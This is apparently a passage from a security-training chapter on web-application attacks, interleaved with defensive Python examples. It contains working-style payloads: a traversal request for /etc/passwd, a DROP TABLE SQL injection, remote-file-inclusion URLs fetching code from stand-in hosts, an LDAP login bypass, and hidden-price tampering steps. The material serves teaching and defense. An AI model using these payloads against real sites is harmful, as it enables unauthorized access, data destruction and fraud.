Hidden fields that are invisible to the end user provide status information to the web application. For example, consider a product order form that includes the following hidden field:

    <input type="hidden" name="price" value="99.90">

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the following combo box:

    <FORM METHOD=POST ACTION="xferMoney.asp">
    Source Account: <SELECT NAME="SrcAcc">
    <OPTION VALUE="123456789">******789</OPTION>
    <OPTION VALUE="868686868">******868</OPTION></SELECT>
    <BR>Amount: <INPUT NAME="Amount" SIZE=20>
    <BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
    <BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
    </FORM>

Bypassing

An attacker may bypass the need to choose between two accounts by adding another account into the HTML page source code. The new combo box entry is displayed in the web browser and the attacker can choose the new account.

HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the web browser, the following URL is requested:

http://www.juggybank.com/cust.asp?profile=21&debit=2500

An attacker may change the URL parameters (profile and debit) in order to debit another account:

http://www.juggybank.com/cust.asp?profile=82&debit=1500

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules.

Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

http://www.juggybank.com/stat.asp?pg=531&status=view


An attacker can modify the status parameter to delete in order to delete the content:

http://www.juggybank.com/stat.asp?pg=147&status=delete

Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as parameters allowing access to developer and debugging information.
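A server-side check is what defeats each of the tampering cases above (the hidden price field, the SrcAcc combo box, and the profile/status URL parameters): the server must not take price or ownership from the client. The Python below is an added example for this edit, not the module's or EC-Council's code; the catalog, the account ownership table, the page author table and every identifier in it are constructed assumptions. Each function compares what the client sent with what the server already knows and refuses the request when they disagree.

```python
# Constructed server-side state for the demo (hypothetical values, not the module's data).
CATALOG = {"SKU-100": 99.90, "SKU-200": 250.00}                    # authoritative prices
ACCOUNT_OWNER = {"123456789": "jason", "868686868": "jason", "555555555": "alice"}
PAGE_AUTHOR = {531: "jason", 147: "alice"}                          # content id -> creator


def order_total_vulnerable(form):
    """Trusts the hidden 'price' field from the order form: change it to 0.01 and pay 0.01."""
    return round(float(form["price"]) * int(form["qty"]), 2)


def order_total_safe(form):
    """Hardened form: the price comes from the server-side catalog; the client only picks SKU and qty."""
    sku = form.get("sku")
    if sku not in CATALOG:
        raise ValueError("unknown product")
    qty = int(form.get("qty", "0"))
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return round(CATALOG[sku] * qty, 2)


def transfer_safe(session_user, form):
    """Authorize SrcAcc against the logged-in user, not against the options the combo box offered."""
    src = form.get("SrcAcc", "")
    if ACCOUNT_OWNER.get(src) != session_user:
        raise PermissionError("source account is not owned by the session user")
    amount = int(form.get("Amount", "0"))
    if amount <= 0:
        raise ValueError("amount must be positive")
    return {"from": src, "to": form.get("DestAcc", ""), "amount": amount}


def set_status_safe(session_user, pg, status):
    """Attribute parameter check: only the author may request anything other than view."""
    if status not in ("view", "edit", "delete"):
        raise ValueError("unknown status")
    if status != "view" and PAGE_AUTHOR.get(pg) != session_user:
        raise PermissionError("only the author may modify this content")
    return status


if __name__ == "__main__":
    tampered = {"sku": "SKU-100", "price": "0.01", "qty": "1"}
    print("trusting the hidden field:", order_total_vulnerable(tampered))
    print("server-side price:", order_total_safe(tampered))
```

The vulnerable and safe order functions receive the same tampered form; only the second one ignores the client-supplied price.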

Figure 13.6: Form Tampering. Tampering with the URL parameters: http://www.juggybank.com/cust.asp?profile=21&debit=2500 is changed to http://www.juggybank.com/cust.asp?profile=82&debit=1500. Other parameters can be changed, including attribute parameters: http://www.juggybank.com/stat.asp?pg=531&status=view is changed to http://www.juggybank.com/stat.asp?pg=147&status=delete.


Directory Traversal

When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A directory traversal/forceful browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:

Enumerate the contents of files and directories
Access pages that otherwise require authentication (and possibly payment)
Gain secret knowledge of the application and its construction
Discover user IDs and passwords buried in hidden files
Locate source code and other interesting files left on the server
View sensitive data, such as customer information


The following example uses ../ to back up several directories and obtain a file containing a backup of the web application:

http://www.targetsite.com/../../../sitebackup.zip

This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:

http://www.targetsite.com/../../../../etc/passwd

Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:

http://www.juggyboy.com/process.aspx=../../some dir/some file
http://www.juggyboy.com/.././../../some dir/some file

The pictorial representation of a directory traversal attack is shown as follows:
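The requests above succeed only when the server joins the client-supplied path onto its publishing directory without normalizing it first. The Python below is an added example for this edit, not code from the module; WEB_ROOT is an assumed path. It percent-decodes repeatedly (which also covers the URL-encoding obfuscation described under Obfuscation Application, including double encoding), folds backslashes to slashes, rejects NUL bytes, and then normalizes the joined path and confirms it still lies under the root before any file is opened.

```python
import posixpath
import urllib.parse

# Assumed web publishing directory (hypothetical path; any absolute root works).
WEB_ROOT = "/var/www/html"


def canonicalize(raw):
    """Percent-decode until the value stops changing (catches %252e%252e%252f style
    double encoding), reject NUL bytes, and fold backslashes so ..\\ is not missed."""
    decoded = raw
    for _ in range(4):
        again = urllib.parse.unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    return decoded.replace("\\", "/")


def resolve_under_root(root, requested):
    """Return the absolute file path for a requested URL path, or raise PermissionError
    when the normalized result would leave the root directory."""
    rel = canonicalize(requested).lstrip("/")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, rel))
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError("path escapes web root: %r" % requested)
    return candidate


def is_safe_path(requested, root=WEB_ROOT):
    """Boolean wrapper: True when the request stays inside the root."""
    try:
        resolve_under_root(root, requested)
        return True
    except (PermissionError, ValueError):
        return False


if __name__ == "__main__":
    for req in ("/images/logo.png",
                "/../../../sitebackup.zip",
                "/../../../../etc/passwd",
                "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
                "%252e%252e%252f%252e%252e%252fetc%252fpasswd"):
        print("%-50s %s" % (req, "allowed" if is_safe_path(req) else "rejected"))
```

The comparison is done on the normalized result rather than by searching the raw input for "../", so encoded, doubled, or backslash variants are all caught by the same check.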
Figure 13.7: Directory Traversal. The attacker sends a request containing /../../etc/passwd to the vulnerable server code (a PHP script that builds a file path from a $theme variable) and receives the contents of the password file (entries for root, daemon, and Jason).


Security Misconfiguration

Easy Exploitation: Using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc.

Common Prevalence: Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code.

Example: The application server admin console is automatically installed and not removed. Default accounts are not changed. The attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over.

Security Misconfiguration

Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, it results in various problems that can affect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All unnecessary and unsafe features have to be taken care of, and it proves very beneficial if they are completely disabled so that outsiders cannot make use of them for malicious attacks. All the application-based files have to be protected through proper authentication and strong security methods, or crucial information can be leaked to attackers. Examples of unnecessary features that should be disabled or changed include:

The application server admin console is automatically installed and not removed
Default accounts are not changed
Attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over


Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc., and can be easily discovered by application vulnerability scanners and fuzzers.

SQL Injection: It involves the injection of malicious SQL queries into user input forms.

Command Injection: It involves the injection of malicious code through a web application.

LDAP Injection: It involves the injection of malicious LDAP statements.

Injection Flaws

Injection flaws are loopholes in the web application that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in loss or corruption of data, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting such flaws in the web application, the attacker can read, write, delete, and update any data, whether or not it is relevant to that particular application. There are many types of injection flaws; some of them are as follows:

SQL injection

SQL injection is the most common website vulnerability on the Internet. It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. The attacker injects malicious SQL queries into a user input form, usually either to gain unauthorized access to a database or to retrieve information directly from the database.

Command injection

Command injection flaws are another type of web application vulnerability. These flaws are highly dangerous. In this type of attack, the attacker injects malicious code via a web application.

LDAP injection

LDAP injection is an attack method in which a website that constructs LDAP statements from user-supplied input is exploited to launch attacks. When an application fails to sanitize user input, the LDAP statement can be modified with the help of a local proxy. This in turn results in the execution of arbitrary commands, such as granting access to unauthorized queries and altering the content inside the LDAP tree.
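For the LDAP and command injection cases above, the defence has the same shape as for SQL: keep user input as data. The Python below is an added example for this edit, not the module's code; the filter template, the hostname pattern and the ping command are assumptions. It escapes LDAP filter metacharacters as RFC 4515 specifies and shows the unescaped filter beside it, and it builds an operating-system command as an argv list after allow-listing the argument instead of interpolating it into a shell string.

```python
import re

# RFC 4515 section 3: these characters must be escaped inside an LDAP search filter value.
LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter_value(value):
    """Escape one assertion value so it can only ever match literally."""
    return "".join(LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_user_filter(username):
    """Search filter for a login form; the username is data, not filter syntax."""
    return "(&(objectClass=person)(uid=%s))" % escape_ldap_filter_value(username)


def build_user_filter_vulnerable(username):
    """The defect the text describes: raw input pasted into the filter, so the
    input can close the uid assertion and open a new one."""
    return "(&(objectClass=person)(uid=%s))" % username


# Assumed allow-list for a hostname argument: letters, digits, dots and hyphens only,
# never starting with a hyphen (so it cannot be read as an option) and no shell metacharacters.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def build_ping_argv(host):
    """Command injection defence: validate the value against the allow-list and return it
    as its own argv element, to be run with subprocess.run(argv) and never shell=True."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname: %r" % host)
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    crafted = "*)(uid=*"   # constructed input that would widen an unescaped filter
    print("escaped:  ", build_user_filter(crafted))
    print("unescaped:", build_user_filter_vulnerable(crafted))
    print("argv:     ", build_ping_argv("example.com"))
```

In the escaped filter the crafted value stays inside a single uid assertion; in the unescaped one it becomes two assertions, which is the arbitrary-query outcome the text warns about. For the command case, the argv list means the operating system receives the hostname as one argument and no shell ever parses it.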


SQL Injection Attacks

SQL injection attacks use a series of malicious SQL queries to directly manipulate the database.

An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data. SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches.

SQL injection vulnerable server code:

    <?php
    function save_email($user, $message)
    {
        $sql = "INSERT INTO Messages ( user, message ) VALUES ( '$user', '$message' )";
        return mysql_query($sql);
    }
    ?>

When the input test');DROP TABLE Messages;-- is sent to the database server through this code, it drops the Messages table.

Code to insert spammy data on behalf of other users: test'), ('user2', 'I am Jason'), ('user3', 'You are hacked

Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection

SQL Injection Attacks


SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users, validate roles and access levels, store and retrieve information for the application and its users, and link to other data sources. Using SQL injection, an attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data. SQL injection works because the application does not properly validate input before passing it to a SQL statement. For example, the statement

    SELECT * FROM tablename WHERE UserID = 2302

becomes the following with a simple SQL injection attack:

    SELECT * FROM tablename WHERE UserID = 2302 OR 1=1

The expression "OR 1=1" evaluates to TRUE for every row, often allowing the enumeration of all user records in the table. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:

* Log in to the application without supplying valid credentials
* Perform queries against data in the database, often even data to which the application would not normally have access
* Modify the database contents, or drop the database altogether
* Use the trust relationships established between the web application components to access other databases
Web browser, via the Internet, to the server. Attacker input sent in the message field:

    test');DROP TABLE Messages;--

When this reaches the database server as part of the statement, it closes the INSERT and issues DROP TABLE Messages. This only succeeds where the database interface accepts stacked statements; PHP's mysql_query() sends a single statement per call, so the multi-row INSERT payload below is the more reliable of the two against this code.

SQL injection vulnerable server code:

    <?php
    function save_email($user, $message) {
        // $user and $message are pasted straight into the statement text
        $sql = "INSERT INTO Messages ( user, message ) VALUES ( '$user', '$message' )";
        return mysql_query($sql);
    }
    ?>

Code to insert spammy data on behalf of other users (sent as the message value):

    test'), ('user2', 'I am Jason'), ('user3', 'You are hacked

FIGURE 13.8: SQL Injection Attacks
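As an added example (not code from the module), the following Python reproduces both attacks described in this section against an in-memory SQLite database: the multi-row INSERT payload from Figure 13.8 run through a string-built statement shaped like the PHP save_email(), and the OR 1=1 payload against a UserID lookup, each beside a parameterized version. The tables, rows and payload constants are constructed for the example; the stacked-query DROP TABLE payload is left out because Python's sqlite3 module, like PHP's mysql_query(), executes only one statement per call.

```python
import sqlite3

# Constructed payloads: the "OR 1=1" row enumeration from the text and the
# spam INSERT from Figure 13.8.
PAYLOAD_OR_1_EQ_1 = "2302 OR 1=1"
PAYLOAD_SPAM = "test'), ('user2', 'I am Jason'), ('user3', 'You are hacked"


def fresh_db():
    """In-memory SQLite standing in for the page's MySQL backend (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE Messages (user TEXT, message TEXT);
        CREATE TABLE Users (UserID INTEGER, name TEXT);
        INSERT INTO Users VALUES (2302, 'alice'), (2303, 'bob'), (2304, 'carol');
        """
    )
    return db


def save_message_vulnerable(db, user, message):
    """Same shape as save_email() in Figure 13.8: the values are pasted into the
    statement text, so a quote in `message` ends the literal and the rest is SQL."""
    sql = f"INSERT INTO Messages ( user, message ) VALUES ( '{user}', '{message}' )"
    db.execute(sql)
    db.commit()


def save_message_safe(db, user, message):
    """Parameterized: the statement structure is fixed before the values are
    bound, so the payload is stored as an ordinary string."""
    db.execute("INSERT INTO Messages ( user, message ) VALUES ( ?, ? )", (user, message))
    db.commit()


def lookup_user_vulnerable(db, user_id):
    """SELECT * FROM tablename WHERE UserID=<input>, built by concatenation."""
    return db.execute(f"SELECT * FROM Users WHERE UserID = {user_id}").fetchall()


def lookup_user_safe(db, user_id):
    """Reject anything that is not an integer, then bind it as a parameter."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []
    return db.execute("SELECT * FROM Users WHERE UserID = ?", (uid,)).fetchall()


def message_rows(db):
    return db.execute("SELECT user, message FROM Messages ORDER BY rowid").fetchall()


if __name__ == "__main__":
    db = fresh_db()
    save_message_vulnerable(db, "attacker", PAYLOAD_SPAM)
    print(message_rows(db))            # three rows, two "posted" by other users
    db = fresh_db()
    save_message_safe(db, "attacker", PAYLOAD_SPAM)
    print(message_rows(db))            # one row holding the payload verbatim
    print(lookup_user_vulnerable(fresh_db(), PAYLOAD_OR_1_EQ_1))  # every user
    print(lookup_user_safe(fresh_db(), PAYLOAD_OR_1_EQ_1))        # []
```

The parameterized version is the fix; the integer check in lookup_user_safe is defence in depth, since the driver would also refuse to bind a non-numeric string into an INTEGER comparison.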



Command Injection Attacks


Command injection flaws allow attackers to pass malicious code to other systems through a web application. Such attacks include calls to the operating system through system calls, the use of external programs through shell commands, and calls to backend databases through SQL. Scripts written in Perl, Python, and other languages can be injected into, and executed by, poorly designed web applications; if a web application uses any kind of interpreter, injected input can be made to inflict damage. To perform their functions, web applications must use operating system features and external programs. Many programs are invoked externally, and one of the most frequently used is Sendmail. Any piece of information that arrives through an external HTTP request must be carefully scrubbed; otherwise the attacker can insert special characters, malicious commands, and command modifiers into it, and the web application blindly passes them to the external system for execution. SQL injection is a dangerous and rather widespread form of command injection. Command injection attacks are easy to carry out and to discover, but their full impact is often hard to understand.

Shell Injection


To provide their various functions, web applications call other programs, for example sending an email by invoking the UNIX sendmail program. An attacker may be able to inject code into the arguments passed to those programs. This kind of attack is especially dangerous to web application security: such injections allow intruders to perform various types of malicious actions against the server. An attacker tries to craft an input string that gains shell access to the web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.
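As an added example (not code from the module), the following Python models the shell-injection pattern described above with subprocess: one function builds a command string and hands it to the shell the way system()-style APIs do, a second passes the argument as a separate argv element so shell metacharacters are inert, and a third adds allow-list validation before the external program is reached. The host values, and the use of echo in place of ping or sendmail, are constructed for the example so it runs offline.

```python
import re
import subprocess

# Constructed inputs for the demonstration.
GOOD_HOST = "127.0.0.1"
EVIL_HOST = "127.0.0.1; echo INJECTED"

# Allow-list for what a hostname or IP argument may look like.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def run_vulnerable(host):
    """Build one command string and hand it to /bin/sh, as system()-style
    wrappers do. `echo` stands in for ping/sendmail so this runs offline;
    the shell still honours ';', so the payload runs a second command."""
    cmd = "echo pinging " + host
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def run_argv(host):
    """No shell: the host is one argv element, so ';' is data, not syntax."""
    out = subprocess.run(["echo", "pinging", host], capture_output=True, text=True)
    return out.stdout.strip()


def is_safe_host(host):
    """Allow-list check applied before the value reaches any external program."""
    return bool(HOSTNAME_RE.match(host))


def run_safe(host):
    """Allow-list validation plus argv execution."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return run_argv(host)


if __name__ == "__main__":
    print(run_vulnerable(EVIL_HOST))   # second line 'INJECTED': the shell ran our command
    print(run_argv(EVIL_HOST))         # the payload is echoed back literally
    print(run_safe(GOOD_HOST))
```

Passing an argv list is what removes the shell from the path; the allow-list is still worthwhile because the external program itself may interpret leading dashes or other characters as options.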

HTML Embedding
This type of attack is used to deface websites. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML markup or scripting.

File Injection
The attacker exploits this vulnerability to make the application include and execute code from a file the attacker controls, for example:
    http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?
Users are allowed to upload files to the server through various applications, and those files can then be reached over the Internet from anywhere in the world. If an uploaded file has a .php extension and any user requests it, the server interprets it as a PHP script and executes it. This allows an attacker to execute arbitrary commands on the server.



Command Injection Example


The following is an example of command injection against a banner-management CGI script (Figure 13.9). The attacker enters malicious code (an account number together with a new password) into the Banner URL field, using the script's | field delimiter; the last two sets of numbers are the banner size. Once the attacker clicks the submit button, the password for account 1036 is changed to "newpassword." The server script assumes that only the URL of the banner image file is entered in that field, and builds its database INSERT and UPDATE record commands from it without validating the input; that missing validation is what the attack exploits.


Attacker launching a code injection attack against:
    http://juggyboy/cgibin/lspro/lspro.cgi?hit_out=1036

Malicious code entered in the Banner URL field:
    www.juggyboy.com/banner.gif||newpassword||1036|60|468

Form as filled in on JuggyBoy.com: User Name: Addison; Email Address: addi@juggyboy.com; Site URL: www.juggyboy.com; Banner URL: ...gif||newpassword||1036|60|468; Password: newpassword

Poor input validation at the server script was exploited in this attack, which uses database INSERT and UPDATE record commands.

FIGURE 13.9: Command Injection Example



File Injection Attack
Users are allowed to upload files to the server through various applications, and those files can be accessed over the Internet from anywhere in the world. If an uploaded file has a .php extension and any user requests it, the server interprets it as a PHP script and executes it, allowing an attacker to execute arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server so that they use a remote file instead of the presumably trusted file from the local file system. Consider the following client code running in a browser:

    <form method="get">
      <select name="DRINK">
        <option value="pepsi">pepsi</option>
        <option value="coke">coke</option>
      </select>
      <input type="submit">
    </form>

Vulnerable PHP code:

    <?php
    $drink = 'coke';
    if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];   // attacker-controlled, never validated
    require($drink . '.php');      // include path built from the parameter
    ?>

To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit. The trailing ? in the payload turns the ".php" that the script appends into a query string of the remote request, so the file actually fetched and executed is http://jasoneval.com/exploit. Remote inclusion of this kind requires PHP's allow_url_include setting to be enabled; where it is disabled, the same unvalidated parameter can still be abused to include other local .php files through path traversal, for example one the attacker previously uploaded.

Exploit code:
    http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
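As an added example (not code from the module), the following Python reproduces the include-path-from-parameter defect in a form that runs offline: a template name is concatenated into a file path exactly as require($drink . '.php') does. Python's open() does not fetch URLs, so the demonstration uses the local-traversal variant of the same flaw rather than a remote file, and contrasts it with an allow-list lookup that rejects traversal strings and URLs alike. The template directory, its contents and the secret file are constructed for the example.

```python
import os
import tempfile

# Allow-list: the DRINK parameter is a key into this map, never a path.
ALLOWED_TEMPLATES = {"coke": "coke.txt", "pepsi": "pepsi.txt"}


def make_fixture():
    """Constructed layout: <root>/templates/{coke,pepsi}.txt plus a secret
    file one level above the template directory."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "templates")
    os.mkdir(tpl)
    for name in ("coke", "pepsi"):
        with open(os.path.join(tpl, name + ".txt"), "w") as f:
            f.write(f"order form for {name}\n")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("db_password=hunter2\n")   # constructed secret for the demo
    return root


def include_vulnerable(root, drink):
    """Mirrors require($drink . '.php'): the parameter is concatenated into
    the path unchecked, so '../secret' walks out of the template directory."""
    path = os.path.join(root, "templates", drink + ".txt")
    with open(path) as f:
        return f.read()


def is_allowed_drink(drink):
    return drink in ALLOWED_TEMPLATES


def include_safe(root, drink):
    """The parameter only selects an allow-list entry; the real file name comes
    from the map, so traversal strings and URLs never reach the filesystem
    (or, in PHP, the URL stream wrapper)."""
    if not is_allowed_drink(drink):
        raise ValueError(f"unknown DRINK value: {drink!r}")
    path = os.path.join(root, "templates", ALLOWED_TEMPLATES[drink])
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    root = make_fixture()
    print(include_vulnerable(root, "coke"), end="")
    print(include_vulnerable(root, "../secret"), end="")   # leaks secret.txt
    print(include_safe(root, "coke"), end="")
    print(is_allowed_drink("http://jasoneval.com/exploit?"))  # False
```

An allow-list is preferable to blocking "../" or "http://" substrings, because the set of accepted values is closed and nothing the attacker types is ever used as part of a path.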


What Is LDAP Injection?

An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services, in order to obtain direct access to the databases behind an LDAP tree. LDAP Directory Services store and organize information based on its attributes; the information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model, and clients can search the directory entries using filters (see the filter syntax in Figure 13.10).

What Is LDAP Injection?
An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All input that reaches an LDAP statement must be properly filtered; otherwise the attacker can execute unauthorized queries or modify directory contents. LDAP injection attacks target web applications that construct LDAP statements from user input, typically by modifying the request with a local intercepting proxy; when the application fails to sanitize that input, the LDAP statement is altered. Directory services store and organize information based on its attributes, hierarchically organized as a tree of directory entries. LDAP is based on the client-server model, and clients search the directory entries using filters.


Filter syntax: (attributeName operator value)

    Operator    Example
    =           (objectclass=user)
    >=          (mdbStorageQuota>=100000)
    <=          (mdbStorageQuota<=100000)
    ~=          (displayName~=Foeckeler)
    *           (displayName=*John*)
    AND (&)     (&(objectclass=user)(displayName=John))
    OR (|)      (|(objectclass=user)(displayName=John))
    NOT (!)     (!(objectClass=group))

FIGURE 13.10: LDAP Injection



How LDAP Injection Works
LDAP injection attacks are commonly used against web applications. Any application that builds LDAP queries from some kind of user input is a potential target. To test whether an application is vulnerable to LDAP code injection, send it a query that generates invalid input; if the LDAP server returns an error, the application can be exploited with code injection techniques. Depending on the implementation of the target, an attacker can try to achieve:
* Login bypass
* Information disclosure
* Privilege escalation
* Information alteration


Normal operation: the client sends a normal query to the LDAP server and receives the normal result.
FIGURE 13.11: Normal operation

Operation with code injection: the client sends a normal query plus injected code to the LDAP server and receives the normal result and/or additional information.
FIGURE 13.12: Operation with code injection

Attack
If an attacker enters the valid user name "juggyboy" and appends the injection so that the username field holds juggyboy)(&)), the filter becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server, that is, only the query (&(USER=juggyboy)(&)) is evaluated. Since (&) is the always-true filter, this query is true for the juggyboy account regardless of the password, and the attacker logs into the system without a valid password.

Account Login form as filled in by the attacker: Username: juggyboy)(&))  Password: blah
FIGURE 13.13: Attack



Hidden Field Manipulation Attack
Hidden field manipulation attacks are mostly used against e-commerce websites, and many online stores face this problem. For every client session, developers use hidden fields to store client information, including the price of the product (and any discount). Developers often assume that the applications they build are safe, but an attacker can manipulate the price of a product and complete the transaction at the price he or she has altered rather than the actual price. For example, a mobile phone listed for $1000 can be bought by the attacker for only $10 by altering the price field. This is a serious loss for website owners, and a site that is attacked in this way often also loses credibility in the market. Website owners deploy antivirus software, firewalls, intrusion detection systems, etc. to protect their networks, but a manipulated hidden field arrives as a perfectly well-formed request, so those controls do not stop it; the fix is for the server never to trust a value it previously handed to the client.

When a user makes selections on an HTML page, the selections are stored as form field values and sent to the application as an HTTP request (GET or POST). HTML pages can also store field values as hidden fields, which are not rendered on the user's screen but are collected and submitted as parameters when the form is submitted. Attackers can examine the HTML code of the page and change the hidden field values in order to change the requests posted to the server.

HTML code:

    <form method="post" action="page.aspx">
      Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
      Product price: <input type="hidden" name="PRICE" value="200.00"><br>
      <input type="submit" value="submit">
    </form>

1. Open the HTML page in an HTML editor.
2. Locate the hidden field (e.g., <input type="hidden" name="PRICE" value="200.00">).
3. Modify its content to a different value (e.g., <input type="hidden" name="PRICE" value="2.00">).
4. Save the HTML file locally and open it in a browser.
5. Click the Buy button to perform electronic shoplifting via hidden field manipulation.

Normal request:
    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00

Attack request (hidden field PRICE changed from 200.00 to 2.00):
    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00

FIGURE 13.14: Hidden Field Manipulation Attack
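As an added example (not code from the module), the following Python parses the two requests shown above and contrasts a checkout that trusts the price field with one that looks the price up server-side by product name, which is the fix this attack calls for. It goes one step beyond the page by also showing an HMAC-signed field for the cases where a value genuinely has to round-trip through the client. The catalog and the signing key are constructed for the example.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

# Constructed server-side catalog; the page shows only the one product.
CATALOG = {"Juggyboy Shirt": 200.00}
# Constructed key for the signed-field variant; a real deployment loads this
# from the server's secret store.
SIGNING_KEY = b"example-only-key"

NORMAL_REQUEST = "http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00"
ATTACK_REQUEST = "http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00"


def form_params(url):
    """First value of each query parameter, as the server would see them."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def charge_vulnerable(url):
    """Trusts the price that was handed to the client as a hidden field."""
    return float(form_params(url)["price"])


def charge_safe(url):
    """Ignores the client-supplied price; the product name is only a key
    into the server's own catalog."""
    product = form_params(url)["product"]
    if product not in CATALOG:
        raise ValueError(f"unknown product: {product!r}")
    return CATALOG[product]


def sign_field(value):
    """For values that must round-trip through the client, attach an HMAC
    so the server can detect any modification."""
    mac = hmac.new(SIGNING_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def verify_field(signed):
    """Return the value if the MAC matches, raise otherwise."""
    value, _, mac = signed.rpartition("|")
    expected = hmac.new(SIGNING_KEY, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("hidden field was tampered with")
    return value


def is_untampered(signed):
    try:
        verify_field(signed)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(charge_vulnerable(ATTACK_REQUEST))   # 2.0: electronic shoplifting
    print(charge_safe(ATTACK_REQUEST))         # 200.0
    signed = sign_field("200.00")
    print(is_untampered(signed), is_untampered(signed.replace("200.00", "2.00", 1)))
```

Server-side lookup is the right answer for prices; the signed field is for state such as a shopping-cart snapshot that the server does not want to keep, and even then the server must still apply its own authorization checks to the verified value.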



Cross-Site Scripting (XSS) Attacks
